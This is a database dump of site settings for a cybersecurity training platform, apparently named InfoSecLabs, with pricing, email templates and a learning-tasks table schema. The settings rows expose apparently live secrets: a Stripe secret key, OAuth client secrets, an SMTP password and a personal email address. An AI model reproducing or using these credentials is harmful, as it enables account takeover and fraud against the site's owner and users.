('blog_lock_microsoft-patches-84-flaws-in-march-patch-tuesday-including-two-public-zero-days', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-releases-windows-10-kb5078885-extended-security-update', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_microsoft-releases-windows-11-oob-hotpatch-to-fix-rras-rce-flaw', 'locked', 'blog_locks', '2026-03-15 06:01:21'),
('blog_lock_microsoft-windows-11-users-can-t-access-c-drive-on-some-samsung-pcs', 'locked', 'blog_locks', '2026-03-15 09:00:03'),
('blog_lock_starbucks-discloses-data-breach-affecting-hundreds-of-employees', 'locked', 'blog_locks', '2026-03-15 09:00:07'),
('blog_lock_supply-chain-risk-why-vendors-are-the-new-zero-day', 'locked', 'blog_locks', '2026-03-14 18:13:20'),
('blog_lock_veeam-patches-7-critical-backup-replication-flaws-allowing-remote-code-execution', 'locked', 'blog_locks', '2026-03-14 09:00:09'),
('blog_lock_veeam-warns-of-critical-flaws-exposing-backup-servers-to-rce-attacks', 'locked', 'blog_locks', '2026-03-14 18:13:26'),
('blog_lock_web-server-exploits-and-mimikatz-used-in-attacks-targeting-asian-critical-infrastructure', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('blog_lock_weekly-recap-qualcomm-0-day-ios-exploit-chains-airsnitch-attack-vibe-coded-malware', '\"locked\"', 'blog_locks', '2026-03-13 05:11:26'),
('build_id', '\"1741453200\"', 'version', '2026-03-13 05:11:26'),
('day', '\"friday\"', 'newsletterSchedule', '2026-03-13 05:11:26'),
('default_threat_map', '\"https://livethreatmap.radware.com\"', 'general', '2026-03-13 05:11:26'),
('discount_monthly_percent', '\"60\"', 'payment', '2026-03-13 05:11:26'),
('discount_yearly_percent', '\"60\"', 'payment', '2026-03-13 05:11:26'),
('email_from_address', '\"noreply@infoseclabs.io\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_host', '\"\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_pass', '\"\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_port', '\"587\"', 'email', '2026-03-13 05:11:26'),
('email_smtp_user', '\"\"', 'email', '2026-03-13 05:11:26'),
('enabled', 'true', 'newsletterSchedule', '2026-03-13 05:11:26'),
('free_tier_limit', '\"3\"', 'general', '2026-03-13 05:11:26'),
('giveaway', '\"{\\\"last_winner_id\\\":189,\\\"last_winner_name\\\":\\\"Amadou Mane\\\",\\\"last_awarded_at\\\":\\\"2026-02-28T21:00:00.850Z\\\",\\\"award_type\\\":\\\"gold\\\"}\"', NULL, '2026-03-13 05:11:26'),
('google_analytics_id', '\"G-L24HQ8D3ZW\"', 'general', '2026-03-13 05:11:26'),
('google_client_id', '\"891940943701-vpaiopokpe1fau3pa1ujvfh37ldkjvjr.apps.googleusercontent.com\"', 'oauth', '2026-03-13 05:11:26'),
('google_client_secret', '\"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\"', 'oauth', '2026-03-13 05:11:26'),
('google_enabled', 'true', 'oauth', '2026-03-13 05:11:26'),
('hide_tiers', 'false', 'payment', '2026-03-13 05:11:26'),
('hour', '\"9\"', 'newsletterSchedule', '2026-03-13 05:11:26'),
('investigation_graded_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: 
rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Performance Review</h1> <p>Your investigation report for <strong>{{title}}</strong> has been audited.</p> <div style=\\\"background-color: #131416; border: 1px solid #333; border-radius: 8px; padding: 20px; text-align: center; margin: 20px 0;\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; text-transform:uppercase; letter-spacing:1px;\\\">Final Grade</p> <h2 style=\\\"margin:10px 0; font-size:48px; color: #{{gradeColor}};\\\">{{grade}}</h2> </div> <div class=\\\"card\\\" style=\\\"border-left: 4px solid #{{gradeColor}};\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px;\\\">Auditor Feedback</p> <p style=\\\"margin:5px 0 0 0; color:#fff; font-style:italic;\\\">\\\"{{feedback}}\\\"</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{baseUrl}}/dashboard\\\" class=\\\"button\\\">View Full Details</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('investigation_graded_subject', '\"Report Graded: {{title}}\"', 'email_template', '2026-03-16 06:05:29'),
('linkedin_client_id', '\"78hx8fqv7sgh54\"', 'oauth', '2026-03-13 05:11:26'),
('linkedin_client_secret', '\"WPL_AP1.sWmY8fRq08WDknvX.zqKpHw==\"', 'oauth', '2026-03-13 05:11:26'),
('linkedin_enabled', 'true', 'oauth', '2026-03-13 05:11:26'),
('newsletter_day', '\"monday\"', NULL, '2026-03-13 05:11:26'),
('newsletter_enabled', '\"1\"', NULL, '2026-03-13 05:11:26'),
('newsletter_hour', '\"7\"', NULL, '2026-03-13 05:11:26'),
('password_reset_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: 
rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Password Reset Protocol</h1> <p>We received a request to reset the credentials for your account.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #fca5a5;\\\"> <p style=\\\"margin:0; color:#f87171; font-weight:bold;\\\">Expiration Warning</p> <p style=\\\"margin:5px 0 0 0; color:#fff;\\\">This secure link expires in 60 minutes.</p> </div> <p>If you did not initiate this request, immediate perimeter checks are recommended.</p> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\" style=\\\"background: linear-gradient(135deg, #ef4444 0%, #b91c1c 100%); box-shadow: 0 4px 15px rgba(239, 68, 68, 0.4);\\\">Reset Password</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('password_reset_subject', '\"Security Alert: Password Reset Request\"', 'email_template', '2026-03-16 06:05:29'),
('plan_free_name', '\"Free Tier\"', 'payment', '2026-03-13 05:11:26'),
('plan_monthly_name', '\"Monthly Pro\"', 'payment', '2026-03-13 05:11:26'),
('plan_yearly_name', '\"Yearly Pro\"', 'payment', '2026-03-13 05:11:26'),
('price_free', '\"0\"', 'payment', '2026-03-13 05:11:26'),
('price_monthly', '\"19.99\"', 'payment', '2026-03-13 05:11:26'),
('price_yearly', '\"199.99\"', 'payment', '2026-03-13 05:11:26'),
('registration_enabled', '\"true\"', 'general', '2026-03-13 05:11:26'),
('reset_password_body', '\"<h1>Password Reset Request</h1><p>You requested to reset your password. Click the link below to proceed:</p><p><a href=\\\"{{url}}\\\">Reset Password</a></p><p>If you did not request this, please ignore this email.</p>\"', 'email_template', '2026-03-13 05:11:26'),
('reset_password_subject', '\"Reset your InfoSec Labs Password\"', 'email_template', '2026-03-13 05:11:26'),
('site_title', '\"InfoSecLabs\"', 'general', '2026-03-13 05:11:26'),
('smtp_host', '\"mail.infoseclabs.io\"', 'email', '2026-03-13 05:11:26'),
('smtp_pass', '\"Konyalim82@\"', 'email', '2026-03-13 05:11:26'),
('smtp_port', '\"587\"', 'email', '2026-03-13 05:11:26'),
('smtp_user', '\"noreply@infoseclabs.io\"', 'email', '2026-03-13 05:11:26'),
('stripe_price_display_monthly', '\"$7.59\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_display_yearly', '\"$75.99\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_monthly', '\"price_1TALBWL5VKtXn66bRSJSd4k8\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_original_monthly', '\"18.98\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_original_yearly', '\"189.98\"', 'payment', '2026-03-13 05:11:26'),
('stripe_price_yearly', '\"price_1TALBXL5VKtXn66bosag5eho\"', 'payment', '2026-03-13 05:11:26'),
('stripe_publishable_key', '\"pk_live_51QQtYrL5VKtXn66boiqeGpfhs7jYgGOERnWlxNwjTYtFuigU04AdXl0CnFhH0FLBUNo6MVAjPLACpXcYjgJuY3BU00ViZYgEBE\"', 'payment', '2026-03-13 05:11:26'),
('stripe_secret_key', '\"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\"', 'payment', '2026-03-13 05:11:26'),
('stripe_webhook_secret', '\"whsec_TTJgpSwgkcQFwNyM7IKkrodE2aTTSL8H\"', 'payment', '2026-03-13 05:11:26'),
('subscriber_count', '\"203\"', 'newsletter', '2026-03-13 05:11:26'),
('subscription_upgraded_body', '\"<h1>Welcome to Pro!</h1><p>Hi {{name}},</p><p>Your account has been successfully upgraded to the Pro plan. Enjoy access to all premium features!</p>\"', 'email_template', '2026-03-13 05:11:26'),
('subscription_upgraded_subject', '\"Subscription Upgraded to Pro\"', 'email_template', '2026-03-13 05:11:26'),
('support_email', '\"support@infoseclabs.io\"', 'general', '2026-03-13 05:11:26'),
('system_email', '\"noreply@infoseclabs.io\"', 'general', '2026-03-13 05:11:26'),
('testEmail', '\"halilbaris@gmail.com\"', 'newsletter', '2026-03-13 05:11:26'),
('tier_large_price', '\"10.99\"', 'payment', '2026-03-13 05:11:26'),
('tier_large_stripe_id', '\"price_1Ss7tnL5VKtXn66bknA3p8Qg\"', 'payment', '2026-03-13 05:11:26'),
('tier_large_stripe_id_yearly', '\"price_1Ss7toL5VKtXn66bgJTb3as9\"', 'payment', '2026-03-13 05:11:26'),
('tier_medium_price', '\"11.99\"', 'payment', '2026-03-13 05:11:26'),
('tier_medium_stripe_id', '\"price_1Ss7tjL5VKtXn66b7UWfkCQe\"', 'payment', '2026-03-13 05:11:26'),
('tier_medium_stripe_id_yearly', '\"price_1Ss7tpL5VKtXn66b4oXBQ9yj\"', 'payment', '2026-03-13 05:11:26'),
('tier_small_price', '\"12.99\"', 'payment', '2026-03-13 05:11:26'),
('tier_small_stripe_id', '\"price_1Ss7thL5VKtXn66bK1YWxkdV\"', 'payment', '2026-03-13 05:11:26'),
('tier_small_stripe_id_yearly', '\"price_1Ss7tqL5VKtXn66bcWLhJjOC\"', 'payment', '2026-03-13 05:11:26'),
('timestamp', '\"2026-03-08T17:00:00Z\"', 'version', '2026-03-13 05:11:26'),
('verification_body', '\"<h1>Welcome to InfoSec Labs!</h1><p>Please verify your email address by clicking the link below:</p><p><a href=\\\"{{url}}\\\">Verify Email</a></p>\"', 'email_template', '2026-03-13 05:11:26'),
('verification_subject', '\"Verify your InfoSec Labs Account\"', 'email_template', '2026-03-13 05:11:26'),
('verify_email_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: rgba(255,255,255,0.05); 
padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Verify Your Account</h1> <p>Welcome, Analyst.</p> <p>To initialize your secure workspace and begin your training simulations, you must verify this communication channel.</p> <div class=\\\"card\\\"> <p style=\\\"margin:0; color:#aaa; font-size:12px; text-transform:uppercase;\\\">Action Required</p> <p style=\\\"margin:5px 0 0 0; color:#fff;\\\">Click the button below to activate your clearance.</p> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\">Verify Email</a> </div> <p style=\\\"font-size: 12px; color: #666; margin-top: 30px;\\\">Direct uplink: <br><a href=\\\"{{link}}\\\" style=\\\"color: #666;\\\">{{link}}</a></p> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('verify_email_subject', '\"Action Required: Verify Your Identity\"', 'email_template', '2026-03-16 06:05:29'),
('version', '\"1.2.0\"', 'version', '2026-03-13 05:11:26'),
('weekly_report_body', '\"\\n<!DOCTYPE html>\\n<html>\\n<head>\\n    <meta charset=\\\"utf-8\\\">\\n    <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\n</head>\\n<body style=\\\"margin: 0; padding: 0; background-color: #0e0f11; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, sans-serif;\\\">\\n    <table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" style=\\\"background-color: #0e0f11; padding: 40px 20px;\\\">\\n        <tr>\\n            <td align=\\\"center\\\">\\n                <table width=\\\"600\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" style=\\\"max-width: 600px;\\\">\\n                    <!-- Header -->\\n                    <tr>\\n                        <td style=\\\"text-align: center; padding-bottom: 30px;\\\">\\n                            <img src=\\\"https://infoseclabs.io/logo.png?v=2\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; margin-bottom: 20px; background-color: rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\">\\n                            <h1 style=\\\"color: #ffffff; font-size: 28px; margin: 0 0 10px 0;\\\">Weekly Analyst Report</h1>\\n                            <p style=\\\"color: #888; font-size: 14px; margin: 0;\\\">Performance Metrics & Activity Summary</p>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- Greeting -->\\n                    <tr>\\n                        <td style=\\\"padding: 20px 0;\\\">\\n                            <p style=\\\"color: #cccccc; font-size: 15px; margin: 0; text-align: center;\\\">\\n                                Hello {{name}}, 👋<br><br>\\n                                Here is your performance summary for this week.\\n                            </p>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- This Week Stats -->\\n                    <tr>\\n                        <td 
style=\\\"background-color: #1a1b1e; border-radius: 12px; padding: 25px; margin-bottom: 20px; display: block;\\\">\\n                            <div style=\\\"border-bottom: 1px solid #2a2a3e; padding-bottom: 15px; margin-bottom: 20px;\\\">\\n                                <span style=\\\"color: #b026ff; font-weight: bold; font-size: 14px; text-transform: uppercase; letter-spacing: 1px;\\\">📅 This Week\'s Activity</span>\\n                            </div>\\n                            \\n                            <table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\n                                <tr>\\n                                    <td width=\\\"50%\\\" style=\\\"padding-bottom: 15px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">Alerts Assigned</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:20px; font-weight:bold;\\\">{{assigned}}</p>\\n                                    </td>\\n                                    <td width=\\\"50%\\\" style=\\\"padding-bottom: 15px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">Investigations Closed</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:20px; font-weight:bold;\\\">{{graded}}</p>\\n                                    </td>\\n                                </tr>\\n                                <tr>\\n                                    <td width=\\\"50%\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px;\\\">Average Score</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#00ff41; font-size:20px; font-weight:bold;\\\">{{avgScore}}%</p>\\n                                    </td>\\n                                    <td width=\\\"50%\\\">\\n                                        <p 
style=\\\"margin:0; color:#888; font-size:12px;\\\">XP Earned</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#b026ff; font-size:20px; font-weight:bold;\\\">+{{totalScore}} XP</p>\\n                                    </td>\\n                                </tr>\\n                            </table>\\n                        </td>\\n                    </tr>\\n\\n                    <!-- All Time Stats -->\\n                    <tr>\\n                        <td style=\\\"background-color: #1a1b1e; border-radius: 12px; padding: 25px; display: block; margin-top: 20px;\\\">\\n                            <div style=\\\"border-bottom: 1px solid #2a2a3e; padding-bottom: 15px; margin-bottom: 20px;\\\">\\n                                <span style=\\\"color: #00ff41; font-weight: bold; font-size: 14px; text-transform: uppercase; letter-spacing: 1px;\\\">🏆 Career Performance</span>\\n                            </div>\\n                            \\n                            <table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\n                                <tr>\\n                                    <td width=\\\"33%\\\" style=\\\"padding-bottom: 20px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:11px;\\\">Total Investigations</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:18px; font-weight:bold;\\\">{{totalInvestigations}}</p>\\n                                    </td>\\n                                    <td width=\\\"33%\\\" style=\\\"padding-bottom: 20px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:11px;\\\">Total XP</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#fff; font-size:18px; font-weight:bold;\\\">{{totalXP}}</p>\\n                                    </td>\\n                                    <td width=\\\"33%\\\" 
style=\\\"padding-bottom: 20px;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:11px;\\\">Best Score</p>\\n                                        <p style=\\\"margin:5px 0 0 0; color:#f59e0b; font-size:18px; font-weight:bold;\\\">{{bestScore}}</p>\\n                                    </td>\\n                                </tr>\\n                                <tr>\\n                                    <td colspan=\\\"3\\\" style=\\\"background-color: #0e0f11; border-radius: 8px; padding: 15px; text-align: center;\\\">\\n                                        <p style=\\\"margin:0; color:#888; font-size:12px; margin-bottom: 5px;\\\">Current Leaderboard Rank</p>\\n                                        <p style=\\\"margin:0; color:#b026ff; font-size:24px; font-weight:bold;\\\">#{{rank}}</p>\\n                                    </td>\\n                                </tr>\\n                            </table>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- CTA -->\\n                    <tr>\\n                        <td style=\\\"text-align: center; padding: 40px 0;\\\">\\n                            <a href=\\\"{{baseUrl}}/dashboard\\\" style=\\\"display: inline-block; background: linear-gradient(135deg, #b026ff, #6366f1); color: white; text-decoration: none; padding: 14px 30px; border-radius: 8px; font-weight: 600; font-size: 15px; box-shadow: 0 4px 15px rgba(99, 102, 241, 0.4);\\\">\\n                                Go to Dashboard →\\n                            </a>\\n                        </td>\\n                    </tr>\\n                    \\n                    <!-- Footer -->\\n                    <tr>\\n                        <td style=\\\"text-align: center; padding-top: 30px; border-top: 1px solid #2a2a3e;\\\">\\n                            <p style=\\\"color: #666; font-size: 12px; margin: 0;\\\">\\n                                You 
are receiving this report as part of your active analyst status.<br>\\n                                <a href=\\\"{{baseUrl}}/profile\\\" style=\\\"color: #888; text-decoration: none;\\\">Manage Notifications</a>\\n                            </p>\\n                            <p style=\\\"color: #444; font-size: 11px; margin-top: 10px;\\\">\\n                                &copy; 2026 InfoSecLabs Platform\\n                            </p>\\n                        </td>\\n                    </tr>\\n                </table>\\n            </td>\\n        </tr>\\n    </table>\\n</body>\\n</html>\\n    \"', 'email_template', '2026-03-16 06:05:29'),
('weekly_report_last_run', '\"2026-03-09\"', 'system', '2026-03-13 05:11:26'),
('weekly_report_subject', '\"Weekly Analyst Report\"', 'email_template', '2026-03-16 06:05:29'),
('welcome_email_body', '\"<!DOCTYPE html><html><head> <meta charset=\\\"utf-8\\\"> <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"> <style> body { font-family: \'Segoe UI\', Tahoma, Geneva, Verdana, sans-serif; background-color: #0e0f11; margin: 0; padding: 0; color: #e0e0e0; } .container { max-width: 600px; margin: 0 auto; background-color: #1a1b1e; border-radius: 12px; overflow: hidden; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.5); border: 1px solid #333; } .header { background: linear-gradient(90deg, #1a1b1e 0%, #2c0b4a 100%); padding: 30px 40px; border-bottom: 1px solid #333; text-align: center; } .logo { color: #00ff41; font-size: 24px; font-weight: 800; letter-spacing: 2px; text-transform: uppercase; text-shadow: 0 0 10px rgba(0, 255, 65, 0.3); margin: 0; } .logo span { color: #b026ff; } .content { padding: 40px; line-height: 1.6; } .h1 { color: #ffffff; margin-top: 0; font-size: 24px; margin-bottom: 20px; } .card { background-color: #131416; border-left: 4px solid #b026ff; padding: 20px; margin: 20px 0; border-radius: 4px; } .button { display: inline-block; background: linear-gradient(135deg, #b026ff 0%, #7928ca 100%); color: white !important; padding: 14px 30px; text-decoration: none; border-radius: 8px; font-weight: bold; margin-top: 20px; text-transform: uppercase; font-size: 14px; letter-spacing: 1px; box-shadow: 0 4px 15px rgba(176, 38, 255, 0.4); } .footer { background-color: #0e0f11; padding: 30px; text-align: center; font-size: 12px; color: #666; border-top: 1px solid #333; } .stat-row { display: flex; justify-content: space-between; margin-bottom: 10px; border-bottom: 1px solid #333; padding-bottom: 10px; } .stat-label { color: #888; } .stat-value { color: #fff; font-weight: bold; } .highlight { color: #00ff41; } </style></head><body> <div class=\\\"container\\\"> <div class=\\\"header\\\"> <img src=\\\"{{baseUrl}}/logo.png\\\" alt=\\\"InfoSecLabs\\\" style=\\\"height: 40px; background-color: 
rgba(255,255,255,0.05); padding: 8px; border-radius: 8px;\\\"> </div> <div class=\\\"content\\\"> <h1 class=\\\"h1\\\">Deployment Authorized</h1> <p>Analyst credentials active.</p> <p>Your objective is to investigate realistic cyber threats, analyze logs, and defend the network. Every correct verdict improves your rank on the global leaderboard.</p> <div class=\\\"card\\\" style=\\\"border-left-color: #00ff41;\\\"> <p style=\\\"margin:0; color:#00ff41; font-weight:bold;\\\">Mission Brief</p> <ul style=\\\"margin:10px 0 0 0; padding-left:20px; color:#ddd;\\\"> <li>Investigate Incidents</li> <li>Earn XP & Badges</li> <li>Compete with Top Analysts</li> </ul> </div> <div style=\\\"text-align: center;\\\"> <a href=\\\"{{link}}\\\" class=\\\"button\\\">Access Dashboard</a> </div> </div> <div class=\\\"footer\\\"> <p>&copy; 2026 InfoSecLabs Platform. All rights reserved.</p> <p>Secure Simulation Environment // Authorized Personnel Only</p> </div> </div></body></html>\"', 'email_template', '2026-03-16 06:05:29'),
('welcome_email_subject', '\"Deployment Authorized: Welcome to InfoSecLabs\"', 'email_template', '2026-03-16 06:05:29');

-- --------------------------------------------------------

--
-- Table structure for table `tasks`
--

-- Learning-path tasks: one row per task belonging to a module (`module_id`).
-- This statement declares no PRIMARY KEY, FOREIGN KEY, UNIQUE or CHECK
-- constraint; phpMyAdmin dumps usually add keys in a later ALTER TABLE
-- section that is not part of this statement, so none of the integrity
-- rules mentioned below are enforced by this DDL on its own — confirm
-- against the ALTER TABLE block for `tasks` before relying on them.
CREATE TABLE `tasks` (
  `id` int(11) NOT NULL,
  -- Owning module. NOT NULL, but no foreign key is visible here, so an
  -- orphaned module_id is not rejected by this statement alone.
  `module_id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  -- Free-text description; nullable, and most seeded rows leave it NULL.
  `description` text DEFAULT NULL,
  -- Task kind. Whether a value outside this list is rejected or silently
  -- stored as '' depends on the session's strict sql_mode, not on the enum.
  `task_type` enum('reading','challenge','quiz','alert_link','external_resource') DEFAULT 'reading',
  -- longtext in utf8mb4_bin is the shape MariaDB uses to dump a JSON column
  -- (same as `alerts`.`playbook_solution`); presumably the task payload —
  -- confirm the expected document structure with the application code.
  `task_data` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,
  -- XP granted for the task. No CHECK constraint here, so negative or
  -- out-of-range values are not rejected at the schema level.
  `xp_reward` int(11) DEFAULT 50,
  -- Presumably the position within the module's task list. Note that the
  -- later seeded rows set this to the task id rather than a 1..n position.
  `display_order` int(11) DEFAULT 0,
  -- Boolean flag stored as tinyint(1); defaults to 1.
  `is_active` tinyint(1) DEFAULT 1,
  -- Defaults to the insert time when not supplied; the seed rows pass
  -- explicit values.
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  -- Maintained by the server: refreshed automatically on every UPDATE.
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  -- Optional link to an `alerts` row (presumably `alerts`.`id`); NULL for
  -- most seeded rows, populated for the alert-backed modules. No FK visible.
  `alert_id` int(11) DEFAULT NULL
) ;

--
-- Dumping data for table `tasks`
--

INSERT INTO `tasks` (`id`, `module_id`, `title`, `description`, `task_type`, `task_data`, `xp_reward`, `display_order`, `is_active`, `created_at`, `updated_at`, `alert_id`) VALUES
(1, 1, 'What is Cybersecurity?', 'Read about cybersecurity fundamentals, the CIA Triad, and why security matters in the digital age.', 'reading', NULL, 20, 1, 1, '2025-12-26 00:33:07', '2025-12-26 00:33:07', NULL),
